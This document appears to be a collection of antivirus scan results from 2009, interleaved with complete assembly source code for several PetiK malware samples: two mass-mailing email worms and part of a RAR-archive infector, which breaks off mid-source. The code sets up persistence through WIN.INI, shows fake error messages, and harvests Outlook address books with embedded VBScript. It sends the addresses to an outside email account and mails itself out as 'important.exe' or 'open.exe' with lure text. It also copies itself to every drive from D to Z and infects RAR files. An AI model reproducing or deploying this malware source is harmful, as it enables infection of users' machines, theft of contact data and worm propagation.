AntiVir 7.9.0.168 2009.05.15 Worm/Stopin.C
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Stopin
Authentium 5.1.2.4 2009.05.15 W32/Heuristic-119!Eldorado
Avast 4.8.1335.0 2009.05.15 Win32:Stopin-B
AVG 8.5.0.336 2009.05.15 I-Worm/Stopin
BitDefender 7.2 2009.05.16 Win32.StopIn.B@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Stopin.c
ClamAV 0.94.1 2009.05.15 Worm.Stopin.C
Comodo 1157 2009.05.08 Worm.Win32.Stopin.C
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Stopin.50688
eSafe 7.0.17.0 2009.05.14 Win32.Stopin.c
eTrust-Vet 31.6.6508 2009.05.16 Win32/Stopin.A
F-Prot 4.4.4.56 2009.05.15 W32/Heuristic-119!Eldorado
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Stopin.c
Fortinet 3.117.0.0 2009.05.16 W32/Stopin.C!worm
GData 19 2009.05.16 Win32.StopIn.B@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Stopin
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Stopin.c
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Stopin.c
McAfee 5616 2009.05.15 W32/Stopin.c@MM
McAfee+Artemis 5616 2009.05.15 W32/Stopin.c@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Stopin.C
Microsoft 1.4602 2009.05.16 Worm:Win32/Stopin.C@mm
NOD32 4080 2009.05.15 Win32/Stopin.C
Norman 6.01.05 2009.05.16 W32/Stopin.C@mm
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Stopin.24064
Panda 10.0.0.14 2009.05.15 W32/Stopin.C
PCTools 4.4.2.0 2009.05.15 I-Worm.Stopin.C
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Stopin.c
Sophos 4.41.0 2009.05.16 W32/Stopin-B
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Stopin.c
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Stopin.c
TrendMicro 8.950.0.1092 2009.05.15 WORM_STOPIN.B
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Essence
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Stopin.C
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Stopin.C
Additional information
File size: 24064 bytes
MD5...: c5ca2b9bea18766448b54c7ecd4c887c
SHA1..: 108ca819544e528b345e8afbc561b1ecda720102
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Extract
Author : PetiK
Date : February 3rd 2002 - February 4th 2002
Size : 5632

Action :

Extract API from DLL directly (the reason for the worm's name)
Copy itself to %SYSDIR%\UPDATEW32.EXE
Create "RUN=" in WIN.INI to start with the computer
Display fake message
Send the Outlook WAB to extractcounter@multimania.com
Take these addresses to spread itself with MAPI functions.
On the 29th display a message box
#

.586p
.model flat
.code

JUMPS

api macro a
extrn a:proc
call a
endm

include Useful.inc
include myinclude.inc

start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx

kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm

kern CloseHandle
kern CopyFileA
kern CreateDirectoryA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetDateFormatA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetSystemTime
kern GetTimeFormatA
kern GetWindowsDirectoryA
kern lstrcat
kern lstrcmp
kern lstrcpy
kern lstrlen
kern MapViewOfFile
kern SetCurrentDirectoryA
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WriteProfileStringA
kern WritePrivateProfileStringA

push 50
mov esi,offset orig_worm
push esi
push 0
call _ptkGetModuleFileNameA
push 50
push offset verif_worm
call _ptkGetSystemDirectoryA
@pushsz "\UPDATEW32.EXE"
push offset verif_worm
call _ptklstrcat

push esi
push offset verif_worm
call _ptklstrcmp
test eax,eax
jz continue_worm

mov edi,offset copy_worm
push edi
push 50
push edi
call _ptkGetSystemDirectoryA
add edi,eax
mov eax,"dpU\"
stosd
mov eax,"Weta"
stosd
mov eax,"e.23"
stosd
mov eax,"ex"
stosd
pop edi
copy_w: push 0
push edi
push esi
call _ptkCopyFileA

run_w: push edi
@pushsz "RUN"
@pushsz "WINDOWS"
call _ptkWriteProfileStringA

call CreateDate
push 50
push offset realname
push offset orig_worm
api GetFileTitleA

@pushsz " - "
push offset date
call _ptklstrcat
push offset realname
push offset date
call _ptklstrcat

f_mess: push 10h
push offset date
call @mess
db "Cannot Open this File !",CRLF,CRLF
db "If you downloaded this file, try downloading again.",0
@mess:
push 0
api MessageBoxA
jmp end_worm
continue_worm:
push 50
push offset vbsfile
call _ptkGetWindowsDirectoryA
@pushsz "\ExtractVbs.vbs"
push offset vbsfile
call _ptklstrcat

push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbsfile
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle

push offset vbsfile
push offset vbsexec
call _ptklstrcpy
push 4
push offset execcontrol
call _ptkWinExec
push 5000
call _ptkSleep
push offset vbsfile
call _ptkDeleteFileA

payload:
push offset Systime
call _ptkGetSystemTime
cmp [Systime.wDay],29
jne end_pay
push 40h
@pushsz "I-Worm.Extract"
call e_mess
db "Hi man, you received my worm !",CRLF
db "Don't panic, it doesn't format your computer",CRLF,CRLF
db 9,"Bye and Have a Nice Day.",0
e_mess:
push 0
api MessageBoxA
end_pay:

sh_gsf: push 0
push 5
push offset progra
push 0
api SHGetSpecialFolderPathA
push offset progra
call _ptkSetCurrentDirectoryA
@pushsz "Update Windows 32bits"
call _ptkCreateDirectoryA
@pushsz "\Update Windows 32bits"
push offset progra
call _ptklstrcat
push offset progra
call _ptkSetCurrentDirectoryA
push 0
@pushsz "MAJ.exe"
push offset orig_worm
call _ptkCopyFileA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet

push 50
push offset winpath
call _ptkGetWindowsDirectoryA
push offset winpath
call _ptkSetCurrentDirectoryA

spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "Outlook_Addr.txt"
call _ptkCreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi

push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3

scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:

end_s3: push esi
call _ptkUnmapViewOfFile
end_s2: push ebp
call _ptkCloseHandle
end_s1: push ebx
call _ptkCloseHandle
end_spread: popad

end_worm:
push 0
api ExitProcess

send_mail:
call CreateDate
call CreateTime
@pushsz "C:\liste.ini"
push offset mail_addr
push offset time
push offset date
call _ptkWritePrivateProfileStringA

xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret

CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "dddd, dd MMMM yyyy"
push 0
push 0
push 9
call _ptkGetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
call _ptkGetTimeFormatA
popad
ret
CreateTime EndP

.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
verif_worm db 50 dup (0)
vbsfile db 50 dup (0)
winpath db 50 dup (0)
progra db 50 dup (0)
mail_addr db 128 dup (?)
realname db 50 dup (0)
date db 30 dup (?)
time db 9 dup (?)
octets dd ?
inet dd 0
sess dd 0
subject db "Re: Check This...",0
body db "Hi",CRLF
db "This is the file you ask for. Open quickly ! It's very important",CRLF,CRLF
db 9,"Best Regards",CRLF,CRLF,CRLF
db "Salut,",CRLF
db "Voici le fichier que tu cherches. Ouvre vite ! C'est très important",CRLF,CRLF
db 9,"Mes sincères salutations",0
filename db "important.exe",0

Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?

MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?

Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
szCloseHandle db "CloseHandle",0
szCopyFileA db "CopyFileA",0
szCreateDirectoryA db "CreateDirectoryA",0
szCreateFileA db "CreateFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetDateFormatA db "GetDateFormatA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetSystemTime db "GetSystemTime",0
szGetTimeFormatA db "GetTimeFormatA",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szlstrcmp db "lstrcmp",0
szlstrcpy db "lstrcpy",0
szlstrlen db "lstrlen",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWriteFile db "WriteFile",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0

_ptkCloseHandle dd ?
_ptkCopyFileA dd ?
_ptkCreateDirectoryA dd ?
_ptkCreateFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetDateFormatA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetSystemTime dd ?
_ptkGetTimeFormatA dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptklstrcmp dd ?
_ptklstrcpy dd ?
_ptklstrlen dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWriteProfileStringA dd ?
_ptkWritePrivateProfileStringA dd ?

s_vbs: db 'On Error Resume Next',CRLF
db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set win=f.GetSpecialFolder(0)',CRLF
db 'Set c=f.CreateTextFile(win&"\Outlook_Addr.txt")',CRLF
db 'c.Close',CRLF
db 'Set out=CreateObject("Outlook.Application")',CRLF
db 'Set mapi=out.GetNameSpace("MAPI")',CRLF
db 'adr="extractcounter@multimania.com"',CRLF
db 'For Each mail in mapi.AddressLists',CRLF
db 'If mail.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mail.AddressEntries.Count',CRLF
db 'adr=adr &";"& mail.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=f.OpenTextFile(win&"\Outlook_Addr.txt",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:

execcontrol db "wscript "
vbsexec db 50 dup (0)
db "",0

end start_worm
end
File Extract.exe received on 05.16.2009 11:58:04 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Trojan-Downloader.Win32.Small!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Petik.worm.5632
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.2
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!76bd
Avast 4.8.1335.0 2009.05.15 Win32:Extract
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.I@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.Y
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.5632.B
F-Prot 4.4.4.56 2009.05.15 W32/Malware!76bd
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm
GData 19 2009.05.16 Win32.Petik.I@mm
Ikarus T3.1.1.49.0 2009.05.16 Trojan-Downloader.Win32.Small
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.2
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.Y@mm
NOD32 4080 2009.05.15 Win32/Petik.Y
Norman 6.01.05 2009.05.16 W32/Pet_Tick.5632.C
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.5632.C
Panda 10.0.0.14 2009.05.16 W32/Extract
PCTools 4.4.2.0 2009.05.15 I-Worm.Tractex.A
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.k
Sophos 4.41.0 2009.05.16 W32/Petik-L
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.L
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Extract
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.5632.B

Additional information
File size: 5632 bytes
MD5...: f6c5adc3869b24363a81d283908a9978
SHA1..: 8451ec7b8f6b487cd39d3d5ea9acdafc27116b28
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Falken
Author : PetiK
Date : February 5th 2002 - February 8th 2002
Size : 6144

Action :
#

.586p
.model flat
.code

JUMPS

api macro a
extrn a:proc
call a
endm

include Useful.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx

kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm

kern CloseHandle
kern CopyFileA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetTickCount
kern GetWindowsDirectoryA
kern lstrcat
kern MapViewOfFile
kern SetCurrentDirectoryA
kern SetFilePointer
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WritePrivateProfileStringA
kern WriteProfileStringA
push 50
mov esi,offset orig_worm
push esi
push 0
call _ptkGetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
call _ptkGetSystemDirectoryA
add edi,eax
mov al,"\"
stosb
call _ptkGetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
copy_g:
push ecx
call _ptkGetTickCount
push 'z'-'a'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'a'
stosb
call _ptkGetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
call _ptkSleep
pop ecx
loop copy_g
mov eax,"exe."
stosd
pop edi

push 50
push offset wininit
call _ptkGetWindowsDirectoryA
@pushsz "\WININIT.INI"
push offset wininit
call _ptklstrcat
push offset wininit
push esi
@pushsz "NUL"
@pushsz "rename"
call _ptkWritePrivateProfileStringA

copy_w: push 0
push edi
push esi
call _ptkCopyFileA

run_w: push edi
@pushsz "RUN"
@pushsz "WINDOWS"
call _ptkWriteProfileStringA

spread_system:
call @lect
db "D:\",0
db "E:\",0
db "F:\",0
db "G:\",0
db "H:\",0
db "I:\",0
db "J:\",0
db "K:\",0
db "L:\",0
db "M:\",0
db "N:\",0
db "O:\",0
db "P:\",0
db "Q:\",0
db "R:\",0
db "S:\",0
db "T:\",0
db "U:\",0
db "V:\",0
db "W:\",0
db "X:\",0
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23
pop ecx
loop_lect:
push ecx
push esi
call _ptkSetCurrentDirectoryA
push 0
@pushsz "winbackup.exe"
push offset orig_worm
call _ptkCopyFileA
@endsz
pop ecx
loop loop_lect
end_spread_system:

payload:
call _ptkGetTickCount
xor edx,edx
mov ecx,20
div ecx
cmp edx,2
jne end_payload
push 10h
@pushsz "I-Worm.Falken"
call @messpay
db "This is the last warning before the attack.",CRLF
db "United States have to stop controling the world.",0
@messpay:
push 0
api MessageBoxA
end_payload:

prep_spread_worm:
push 0
push 20h
push 2
push 0
push 1
push 40000000h
@pushsz "C:\falken.vbs"
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
push 1
@pushsz "wscript C:\falken.vbs"
call _ptkWinExec
push 2000
call _ptkSleep
@pushsz "C:\falken.vbs"
call _ptkDeleteFileA

verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet

push 50
push offset syspath
call _ptkGetSystemDirectoryA
push offset syspath
call _ptkSetCurrentDirectoryA

spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "falkenspread.txt"
call _ptkCreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: mov counter,0
end_l: xor al,al
stosb
inc counter
cmp counter,20
jne end_l
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:

end_s3: push esi
call _ptkUnmapViewOfFile
end_s2: push ebp
call _ptkCloseHandle
end_s1: push ebx
call _ptkCloseHandle
end_spread: popad
@pushsz "falkenspread.txt"
call _ptkDeleteFileA
end_worm:
push 0
api ExitProcess

send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail

push 0
push 80h
push 4
push 0
push 1
push 40000000h
@pushsz "falkenliste.txt"
call _ptkCreateFileA
xchg eax,ebx

push 2
push 0
push 0
push ebx
call _ptkSetFilePointer

push 0
push offset octets
push e_liste - s_liste
push offset s_liste
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
ret

.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
wininit db 50 dup (0)
lect db 50 dup (0)
syspath db 50 dup (0)
octets dd ?
counter dd ?
inet dd 0
sess dd 0

subject db "Last Warning !",0
body db "Message for Everybody,",CRLF
db "Open this file to see what we speak about.",CRLF,CRLF
db 9,"Best Regards",0
filename db "open.exe",0

Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach

MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?

Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?

szCloseHandle db "CloseHandle",0
szCopyFileA db "CopyFileA",0
szCreateFileA db "CreateFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetTickCount db "GetTickCount",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSetFilePointer db "SetFilePointer",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWriteFile db "WriteFile",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0
_ptkCloseHandle dd ?
_ptkCopyFileA dd ?
_ptkCreateFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetTickCount dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSetFilePointer dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWritePrivateProfileStringA dd ?
_ptkWriteProfileStringA dd ?
s_vbs: db 'On Error Resume Next',CRLF
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
db 'Set c=fs.CreateTextFile(sys&"\falkenspread.txt")',CRLF
db 'c.Close',CRLF
db 'Set ou=CreateObject("Outlook.Application")',CRLF
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
db 'adr=""',CRLF
db 'For Each mel in map.AddressLists',CRLF
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mel.AddressEntries.Count',CRLF
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=fs.OpenTextFile(sys&"\falkenspread.txt",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
s_liste:
db "mailto : > "
mail_addr db 50 dup (0)
db " ",CRLF
e_liste:
end start_worm
end
File Falken.exe received on 05.16.2009 11:58:11 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Pettick.worm.6144
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/NewMalware-NetWatcher!Eldorado
Avast 4.8.1335.0 2009.05.15 Win32:Falkon
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.G@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.AC
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Falcon.A
F-Prot 4.4.4.56 2009.05.15 W32/NewMalware-NetWatcher!Eldorado
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm
GData 19 2009.05.16 Win32.Petik.G@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.1
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.Z@mm
NOD32 4080 2009.05.15 Win32/Petik.AC
Norman 6.01.05 2009.05.16 W32/Pet_Tick.6144.C
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.6144
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.15 I-Worm.Tractex.B
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.j
Sophos 4.41.0 2009.05.16 W32/Petik-P
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik
TrendMicro 8.950.0.1092 2009.05.15 WORM_FALKEN.A
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Falken
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Tractex.B
Additional information
File size: 6144 bytes
MD5...: f19278caf2e95e3abd31ad269e1b0814
SHA1..: 4b202c2aabe0a59addf103626cfb304835ecda2e
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment §
Name : W32.Linda
Data : February 13th 2002
Author : PetiK
Language : Win32asm
Size : 8192 (compressed with ASPack).

Action : Infects rar files and ht* files in the current directory.

.386
locals
jumps
.model flat,STDCALL

api macro x
extrn x:proc
call x
endm
WIN32_FIND_DATA struct
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
WIN32_FIND_DATA ends

.DATA
CRLF equ <13,10>
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)

orig_virus db 50 dup (0)
thFile dd ?
Err dd 0
time0 dd 0,0
time1 dd 0,0
time2 dd 0,0

Size equ 8192
HeaderSize = EndRARHeader-RARHeader
rarmask db "*.rar",0
htmmask db "*.ht*",0
hFile dd ?
fHnd dd ?
mHnd dd ?
sizer dd 0
octets dd 0
RARHeader:
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw HeaderSize
RARCompressed dd Size
RAROriginal dd Size
RAROs db 0
RARCrc32 dd 0
RARFileTime db 63h,78h
RARFileDate db 31h,24h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw EndRARHeader-RARName
RARAttrib dd 0
RARName db "LINDA32.EXE"
EndRARHeader label byte
.CODE
start_linda:
mov eax,offset sysTime
push eax
api GetSystemTime
lea eax,sysTime
cmp word ptr [eax+2],8 ; August
jne end_pay
cmp word ptr [eax+6],10 ; 10th. Linda's Birthday
jne end_pay
push 40h
call @tit
db "W32RAR.Linda",0
@tit:
call @mes
db "This virus infects only RAR files.",0dh,0ah
db "Happy Birthday - (c)2002",0
@mes:
push 0
api MessageBoxA
end_pay:

push 50
mov esi,offset orig_virus
push esi
push 0
api GetModuleFileNameA

push 4
push 1000h
push 8192
push 0
api VirtualAlloc
test eax,eax
je end_srch_rar
mov dword ptr [mHnd],eax

push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset orig_virus
api CreateFileA
cmp eax,-1
je end_srch_rar
mov dword ptr [fHnd],eax

push 0
mov dword ptr [sizer],0
lea eax,sizer
push eax
push 8192
push dword ptr [mHnd]
push dword ptr [fHnd]
api ReadFile
push dword ptr [mHnd]
api CloseHandle
rar_srch:
push offset ffile
push offset rarmask
api FindFirstFileA
dec eax
jz end_srch_rar
inc eax
mov dword ptr [hFile],eax
inf_rar:
call times
call infect
cmp byte ptr [Err],1
je rar_nxt_srch
call timer

rar_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_rar
mov eax,dword ptr [hFile]
push eax
api FindClose
end_srch_rar:

htm_srch:
push offset ffile
push offset htmmask
api FindFirstFileA
dec eax
jz end_srch_htm
inc eax
mov dword ptr [hFile],eax

inf_htm:
call infecthtm

htm_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_htm
mov eax,dword ptr [hFile]
push eax
api FindClose
end_srch_htm:

end_linda:
push 0
api ExitProcess
times: push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je tserr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api GetFileTime
push dword ptr [thFile]
api CloseHandle
mov byte ptr [Err],0
ret
tserr: mov byte ptr [Err],1
ret

timer: push 0
push 80h
push 3
push 0
push 1
push 40000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je trerr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api SetFileTime
push dword ptr [thFile]
api CloseHandle
trerr: ret

